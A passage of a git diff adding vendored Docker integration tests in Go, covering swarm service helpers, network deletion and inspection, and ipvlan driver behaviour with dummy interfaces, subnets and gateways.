testEnv.DaemonInfo.ExperimentalBuild { + ops = append(ops, daemon.WithExperimental) + } + d := daemon.New(t, ops...) + d.StartAndSwarmInit(t) + return d +} + +// ServiceSpecOpt is used with `CreateService` to pass in service spec modifiers +type ServiceSpecOpt func(*swarmtypes.ServiceSpec) + +// CreateService creates a service on the passed in swarm daemon. +func CreateService(t *testing.T, d *daemon.Daemon, opts ...ServiceSpecOpt) string { + t.Helper() + spec := defaultServiceSpec() + for _, o := range opts { + o(&spec) + } + + client := d.NewClientT(t) + defer client.Close() + + resp, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{}) + assert.NilError(t, err, "error creating service") + return resp.ID +} + +func defaultServiceSpec() swarmtypes.ServiceSpec { + var spec swarmtypes.ServiceSpec + ServiceWithImage("busybox:latest")(&spec) + ServiceWithCommand([]string{"/bin/top"})(&spec) + ServiceWithReplicas(1)(&spec) + return spec +} + +// ServiceWithInit sets whether the service should use init or not +func ServiceWithInit(b *bool) func(*swarmtypes.ServiceSpec) { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Init = b + } +} + +// ServiceWithImage sets the image to use for the service +func ServiceWithImage(image string) func(*swarmtypes.ServiceSpec) { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Image = image + } +} + +// ServiceWithCommand sets the command to use for the service +func ServiceWithCommand(cmd []string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Command = cmd + } +} + +// ServiceWithConfig adds the config reference to the service +func ServiceWithConfig(configRef *swarmtypes.ConfigReference) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Configs = append(spec.TaskTemplate.ContainerSpec.Configs, configRef) + } +} + +// ServiceWithSecret adds the secret reference to the service +func ServiceWithSecret(secretRef *swarmtypes.SecretReference) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + ensureContainerSpec(spec) + spec.TaskTemplate.ContainerSpec.Secrets = append(spec.TaskTemplate.ContainerSpec.Secrets, secretRef) + } +} + +// ServiceWithReplicas sets the replicas for the service +func ServiceWithReplicas(n uint64) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.Mode = swarmtypes.ServiceMode{ + Replicated: &swarmtypes.ReplicatedService{ + Replicas: &n, + }, + } + } +} + +// ServiceWithName sets the name of the service +func ServiceWithName(name string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.Annotations.Name = name + } +} + +// ServiceWithNetwork sets the network of the service +func ServiceWithNetwork(network string) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.TaskTemplate.Networks = append(spec.TaskTemplate.Networks, + swarmtypes.NetworkAttachmentConfig{Target: network}) + } +} + +// ServiceWithEndpoint sets the Endpoint of the service +func ServiceWithEndpoint(endpoint *swarmtypes.EndpointSpec) ServiceSpecOpt { + return func(spec *swarmtypes.ServiceSpec) { + spec.EndpointSpec = endpoint + } +} + +// GetRunningTasks gets the list of running tasks for a service +func GetRunningTasks(t *testing.T, d *daemon.Daemon, serviceID string) []swarmtypes.Task { + t.Helper() + client := d.NewClientT(t) + defer client.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filterArgs.Add("service", serviceID) + + options := types.TaskListOptions{ + Filters: filterArgs, + } + tasks, err := client.TaskList(context.Background(), options) + assert.NilError(t, err) + return tasks +} + +// ExecTask runs the passed in exec config on the given task +func ExecTask(t *testing.T, d *daemon.Daemon, task swarmtypes.Task, config types.ExecConfig) types.HijackedResponse { + t.Helper() + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + resp, err := client.ContainerExecCreate(ctx, task.Status.ContainerStatus.ContainerID, config) + assert.NilError(t, err, "error creating exec") + + startCheck := types.ExecStartCheck{} + attach, err := client.ContainerExecAttach(ctx, resp.ID, startCheck) + assert.NilError(t, err, "error attaching to exec") + return attach +} + +func ensureContainerSpec(spec *swarmtypes.ServiceSpec) { + if spec.TaskTemplate.ContainerSpec == nil { + spec.TaskTemplate.ContainerSpec = &swarmtypes.ContainerSpec{} + } +} diff --git a/vendor/github.com/docker/docker/integration/network/delete_test.go b/vendor/github.com/docker/docker/integration/network/delete_test.go new file mode 100644 index 0000000000..c2684ae247 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/delete_test.go @@ -0,0 +1,73 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func containsNetwork(nws []types.NetworkResource, networkID string) bool { + for _, n := range nws { + if n.ID == networkID { + return true + } + } + return false +} + +// createAmbiguousNetworks creates three networks, of which the second network +// uses a prefix of the first network's ID as name. The third network uses the +// first network's ID as name. +// +// After successful creation, properties of all three networks is returned +func createAmbiguousNetworks(t *testing.T) (string, string, string) { + client := request.NewAPIClient(t) + ctx := context.Background() + + testNet := network.CreateNoError(t, ctx, client, "testNet") + idPrefixNet := network.CreateNoError(t, ctx, client, testNet[:12]) + fullIDNet := network.CreateNoError(t, ctx, client, testNet) + + nws, err := client.NetworkList(ctx, types.NetworkListOptions{}) + assert.NilError(t, err) + + assert.Check(t, is.Equal(true, containsNetwork(nws, testNet)), "failed to create network testNet") + assert.Check(t, is.Equal(true, containsNetwork(nws, idPrefixNet)), "failed to create network idPrefixNet") + assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "failed to create network fullIDNet") + return testNet, idPrefixNet, fullIDNet +} + +// TestDockerNetworkDeletePreferID tests that if a network with a name +// equal to another network's ID exists, the Network with the given +// ID is removed, and not the network with the given name. +func TestDockerNetworkDeletePreferID(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.34"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + testNet, idPrefixNet, fullIDNet := createAmbiguousNetworks(t) + + // Delete the network using a prefix of the first network's ID as name. + // This should the network name with the id-prefix, not the original network. + err := client.NetworkRemove(ctx, testNet[:12]) + assert.NilError(t, err) + + // Delete the network using networkID. This should remove the original + // network, not the network with the name equal to the networkID + err = client.NetworkRemove(ctx, testNet) + assert.NilError(t, err) + + // networks "testNet" and "idPrefixNet" should be removed, but "fullIDNet" should still exist + nws, err := client.NetworkList(ctx, types.NetworkListOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(false, containsNetwork(nws, testNet)), "Network testNet not removed") + assert.Check(t, is.Equal(false, containsNetwork(nws, idPrefixNet)), "Network idPrefixNet not removed") + assert.Check(t, is.Equal(true, containsNetwork(nws, fullIDNet)), "Network fullIDNet not found") +} diff --git a/vendor/github.com/docker/docker/integration/network/helpers.go b/vendor/github.com/docker/docker/integration/network/helpers.go new file mode 100644 index 0000000000..c0d70a168e --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/helpers.go @@ -0,0 +1,85 @@ +package network + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/parsers/kernel" + "gotest.tools/assert/cmp" + "gotest.tools/icmd" +) + +// CreateMasterDummy creates a dummy network interface +func CreateMasterDummy(t *testing.T, master string) { + // ip link add type dummy + icmd.RunCommand("ip", "link", "add", master, "type", "dummy").Assert(t, icmd.Success) + icmd.RunCommand("ip", "link", "set", master, "up").Assert(t, icmd.Success) +} + +// CreateVlanInterface creates a vlan network interface +func CreateVlanInterface(t *testing.T, master, slave, id string) { + // ip link add link name . type vlan id + icmd.RunCommand("ip", "link", "add", "link", master, "name", slave, "type", "vlan", "id", id).Assert(t, icmd.Success) + // ip link set up + icmd.RunCommand("ip", "link", "set", slave, "up").Assert(t, icmd.Success) +} + +// DeleteInterface deletes a network interface +func DeleteInterface(t *testing.T, ifName string) { + icmd.RunCommand("ip", "link", "delete", ifName).Assert(t, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(t, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(t, icmd.Success) +} + +// LinkExists verifies that a link exists +func LinkExists(t *testing.T, master string) { + // verify the specified link exists, ip link show + icmd.RunCommand("ip", "link", "show", master).Assert(t, icmd.Success) +} + +// IsNetworkAvailable provides a comparison to check if a docker network is available +func IsNetworkAvailable(c client.NetworkAPIClient, name string) cmp.Comparison { + return func() cmp.Result { + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + if err != nil { + return cmp.ResultFromError(err) + } + for _, network := range networks { + if network.Name == name { + return cmp.ResultSuccess + } + } + return cmp.ResultFailure(fmt.Sprintf("could not find network %s", name)) + } +} + +// IsNetworkNotAvailable provides a comparison to check if a docker network is not available +func IsNetworkNotAvailable(c client.NetworkAPIClient, name string) cmp.Comparison { + return func() cmp.Result { + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + if err != nil { + return cmp.ResultFromError(err) + } + for _, network := range networks { + if network.Name == name { + return cmp.ResultFailure(fmt.Sprintf("network %s is still present", name)) + } + } + return cmp.ResultSuccess + } +} + +// CheckKernelMajorVersionGreaterOrEqualThen returns whether the kernel version is greater or equal than the one provided +func CheckKernelMajorVersionGreaterOrEqualThen(kernelVersion int, majorVersion int) bool { + kv, err := kernel.GetKernelVersion() + if err != nil { + return false + } + if kv.Kernel < kernelVersion || (kv.Kernel == kernelVersion && kv.Major < majorVersion) { + return false + } + return true +} diff --git a/vendor/github.com/docker/docker/integration/network/inspect_test.go b/vendor/github.com/docker/docker/integration/network/inspect_test.go new file mode 100644 index 0000000000..659ca29735 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/inspect_test.go @@ -0,0 +1,180 @@ +package network // import "github.com/docker/docker/integration/network" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "gotest.tools/assert" + "gotest.tools/poll" +) + +const defaultSwarmPort = 2477 + +func TestInspectNetwork(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + overlayName := "overlay1" + networkCreate := types.NetworkCreate{ + CheckDuplicate: true, + Driver: "overlay", + } + + netResp, err := client.NetworkCreate(context.Background(), overlayName, networkCreate) + assert.NilError(t, err) + overlayID := netResp.ID + + var instances uint64 = 4 + serviceName := "TestService" + t.Name() + + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err = client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + // Test inspect verbose with full NetworkID + networkVerbose, err := client.NetworkInspect(context.Background(), overlayID, types.NetworkInspectOptions{ + Verbose: true, + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + // Test inspect verbose with partial NetworkID + networkVerbose, err = client.NetworkInspect(context.Background(), overlayID[0:11], types.NetworkInspectOptions{ + Verbose: true, + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + // Test inspect verbose with Network name and swarm scope + networkVerbose, err = client.NetworkInspect(context.Background(), overlayName, types.NetworkInspectOptions{ + Verbose: true, + Scope: "swarm", + }) + assert.NilError(t, err) + assert.Assert(t, validNetworkVerbose(networkVerbose, serviceName, instances)) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + serviceID2 := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll) + + err = client.ServiceRemove(context.Background(), serviceID2) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.NetworkRemove(context.Background(), overlayID) + assert.NilError(t, err) + + poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(instances): + for _, task := range tasks { + if task.Status.State != swarmtypes.TaskStateRunning { + return poll.Continue("waiting for tasks to enter run state") + } + } + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), instances) + } + } +} + +func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + _, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{}) + if err == nil { + return poll.Continue("waiting for network %s to be removed", networkID) + } + return poll.Success() + } +} + +func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + _, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + if err == nil { + return poll.Continue("waiting for service %s to be deleted", serviceID) + } + return poll.Success() + } +} + +func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == 0: + return poll.Success() + default: + return poll.Continue("task count at %d waiting for 0", len(tasks)) + } + } +} + +// Check to see if Service and Tasks info are part of the inspect verbose response +func validNetworkVerbose(network types.NetworkResource, service string, instances uint64) bool { + if service, ok := network.Services[service]; ok { + if len(service.Tasks) != int(instances) { + return false + } + } + + if network.IPAM.Config == nil { + return false + } + + for _, cfg := range network.IPAM.Config { + if cfg.Gateway == "" || cfg.Subnet == "" { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go new file mode 100644 index 0000000000..3da255e747 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go @@ -0,0 +1,432 @@ +package ipvlan + +import ( + "context" + "strings" + "testing" + "time" + + dclient "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + net "github.com/docker/docker/integration/internal/network" + n "github.com/docker/docker/integration/network" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDockerNetworkIpvlanPersistance(t *testing.T) { + // verify the driver automatically provisions the 802.1q link (di-dummy0.70) + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan") + + d := daemon.New(t, daemon.WithExperimental) + d.StartWithBusybox(t) + defer d.Stop(t) + + // master dummy interface 'di' notation represent 'docker ipvlan' + master := "di-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + client, err := d.NewClient() + assert.NilError(t, err) + + // create a network specifying the desired sub-interface name + netName := "di-persist" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("di-dummy0.70", ""), + ) + + assert.Check(t, n.IsNetworkAvailable(client, netName)) + // Restart docker daemon to test the config has persisted to disk + d.Restart(t) + assert.Check(t, n.IsNetworkAvailable(client, netName)) +} + +func TestDockerNetworkIpvlan(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + skip.If(t, !ipvlanKernelSupport(), "Kernel doesn't support ipvlan") + + for _, tc := range []struct { + name string + test func(dclient.APIClient) func(*testing.T) + }{ + { + name: "Subinterface", + test: testIpvlanSubinterface, + }, { + name: "OverlapParent", + test: testIpvlanOverlapParent, + }, { + name: "L2NilParent", + test: testIpvlanL2NilParent, + }, { + name: "L2InternalMode", + test: testIpvlanL2InternalMode, + }, { + name: "L3NilParent", + test: testIpvlanL3NilParent, + }, { + name: "L3InternalMode", + test: testIpvlanL3InternalMode, + }, { + name: "L2MultiSubnet", + test: testIpvlanL2MultiSubnet, + }, { + name: "L3MultiSubnet", + test: testIpvlanL3MultiSubnet, + }, { + name: "Addressing", + test: testIpvlanAddressing, + }, + } { + d := daemon.New(t, daemon.WithExperimental) + d.StartWithBusybox(t) + + client, err := d.NewClient() + assert.NilError(t, err) + + t.Run(tc.name, tc.test(client)) + + d.Stop(t) + // FIXME(vdemeester) clean network + } +} + +func testIpvlanSubinterface(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + master := "di-dummy0" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + + netName := "di-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("di-dummy0.60", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // delete the network while preserving the parent link + err := client.NetworkRemove(context.Background(), netName) + assert.NilError(t, err) + + assert.Check(t, n.IsNetworkNotAvailable(client, netName)) + // verify the network delete did not delete the predefined link + n.LinkExists(t, "di-dummy0") + } +} + +func testIpvlanOverlapParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // verify the same parent interface cannot be used if already in use by an existing network + master := "di-dummy0" + parent := master + ".30" + n.CreateMasterDummy(t, master) + defer n.DeleteInterface(t, master) + n.CreateVlanInterface(t, master, parent, "30") + + netName := "di-subinterface" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan(parent, ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + _, err := net.Create(context.Background(), client, netName, + net.WithIPvlan(parent, ""), + ) + // verify that the overlap returns an error + assert.Check(t, err != nil) + } +} + +func testIpvlanL2NilParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // ipvlan l2 mode - dummy parent interface is provisioned dynamically + netName := "di-nil-parent" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + + _, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL2InternalMode(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-internal" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + net.WithInternal(), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + id2 := container.Run(t, ctx, client, container.WithNetworkMode(netName)) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // FIXME(vdemeester) check the time of error ? + assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL3NilParent(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-nil-parent-l3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithIPAM("172.28.230.0/24", ""), + net.WithIPAM("172.28.220.0/24", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.220.10"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.230.10"), + ) + + _, err := container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL3InternalMode(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "di-internal-l3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithInternal(), + net.WithIPAM("172.28.230.0/24", ""), + net.WithIPAM("172.28.220.0/24", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.220.10"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.230.10"), + ) + + timeoutCtx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + _, err := container.Exec(timeoutCtx, client, id1, []string{"ping", "-c", "1", "-w", "1", "8.8.8.8"}) + // FIXME(vdemeester) check the time of error ? + assert.Check(t, err != nil) + assert.Check(t, timeoutCtx.Err() == context.DeadlineExceeded) + + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", id1}) + assert.NilError(t, err) + } +} + +func testIpvlanL2MultiSubnet(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackl2" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", ""), + net.WithIPv6(), + net.WithIPAM("172.28.200.0/24", ""), + net.WithIPAM("172.28.202.0/24", "172.28.202.254"), + net.WithIPAM("2001:db8:abc8::/64", ""), + net.WithIPAM("2001:db8:abc6::/64", "2001:db8:abc6::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.200.20"), + container.WithIPv6(netName, "2001:db8:abc8::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.200.21"), + container.WithIPv6(netName, "2001:db8:abc8::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.202.20"), + container.WithIPv6(netName, "2001:db8:abc6::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.202.21"), + container.WithIPv6(netName, "2001:db8:abc6::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "172.28.200.1") + // Inspect the v6 gateway to ensure the proper default GW was assigned + assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc8::1") + // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "172.28.202.254") + // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned + assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "2001:db8:abc6::254") + } +} + +func testIpvlanL3MultiSubnet(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + netName := "dualstackl3" + net.CreateNoError(t, context.Background(), client, netName, + net.WithIPvlan("", "l3"), + net.WithIPv6(), + net.WithIPAM("172.28.10.0/24", ""), + net.WithIPAM("172.28.12.0/24", "172.28.12.254"), + net.WithIPAM("2001:db8:abc9::/64", ""), + net.WithIPAM("2001:db8:abc7::/64", "2001:db8:abc7::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netName)) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.10.20"), + container.WithIPv6(netName, "2001:db8:abc9::20"), + ) + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.10.21"), + container.WithIPv6(netName, "2001:db8:abc9::21"), + ) + c1, err := client.ContainerInspect(ctx, id1) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping", "-c", "1", c1.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address second to first + _, err = container.Exec(ctx, client, id2, []string{"ping6", "-c", "1", c1.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 + id3 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.12.20"), + container.WithIPv6(netName, "2001:db8:abc7::20"), + ) + id4 := container.Run(t, ctx, client, + container.WithNetworkMode(netName), + container.WithIPv4(netName, "172.28.12.21"), + container.WithIPv6(netName, "2001:db8:abc7::21"), + ) + c3, err := client.ContainerInspect(ctx, id3) + assert.NilError(t, err) + + // verify ipv4 connectivity to the explicit --ipv address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping", "-c", "1", c3.NetworkSettings.Networks[netName].IPAddress}) + assert.NilError(t, err) + // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth + _, err = container.Exec(ctx, client, id4, []string{"ping6", "-c", "1", c3.NetworkSettings.Networks[netName].GlobalIPv6Address}) + assert.NilError(t, err) + + // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode + assert.Equal(t, c1.NetworkSettings.Networks[netName].Gateway, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + assert.Equal(t, c1.NetworkSettings.Networks[netName].IPv6Gateway, "") + // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode + assert.Equal(t, c3.NetworkSettings.Networks[netName].Gateway, "") + // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled + assert.Equal(t, c3.NetworkSettings.Networks[netName].IPv6Gateway, "") + } +} + +func testIpvlanAddressing(client dclient.APIClient) func(*testing.T) { + return func(t *testing.T) { + // Verify ipvlan l2 mode sets the proper default gateway routes via netlink + // for either an explicitly set route by the user or inferred via default IPAM + netNameL2 := "dualstackl2" + net.CreateNoError(t, context.Background(), client, netNameL2, + net.WithIPvlan("", "l2"), + net.WithIPv6(), + net.WithIPAM("172.28.140.0/24", "172.28.140.254"), + net.WithIPAM("2001:db8:abcb::/64", ""), + ) + assert.Check(t, n.IsNetworkAvailable(client, netNameL2)) + + ctx := context.Background() + id1 := container.Run(t, ctx, client, + container.WithNetworkMode(netNameL2), + ) + // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet + result, err := container.Exec(ctx, client, id1, []string{"ip", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 172.28.140.254 dev eth0")) + // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop + result, err = container.Exec(ctx, client, id1, []string{"ip", "-6", "route"}) + assert.NilError(t, err) + assert.Check(t, strings.Contains(result.Combined(), "default via 2001:db8:abcb::1 dev eth0")) + + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + netNameL3 := "dualstackl3" + net.CreateNoError(t, context.Background(), client, netNameL3, + net.WithIPvlan("", "l3"), + net.WithIPv6(), + net.WithIPAM("172.28.160.0/24", "172.28.160.254"), + net.WithIPAM("2001:db8:abcd::/64", "2001:db8:abcd::254"), + ) + assert.Check(t, n.IsNetworkAvailable(client, netNameL3)) + + id2 := container.Run(t, ctx, client, + container.WithNetworkMode(netNameL3), + ) + // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops + result, err = container.Exec(ctx, client, id2, []string{"ip", "route"}) + assert.NilError(t, err) + 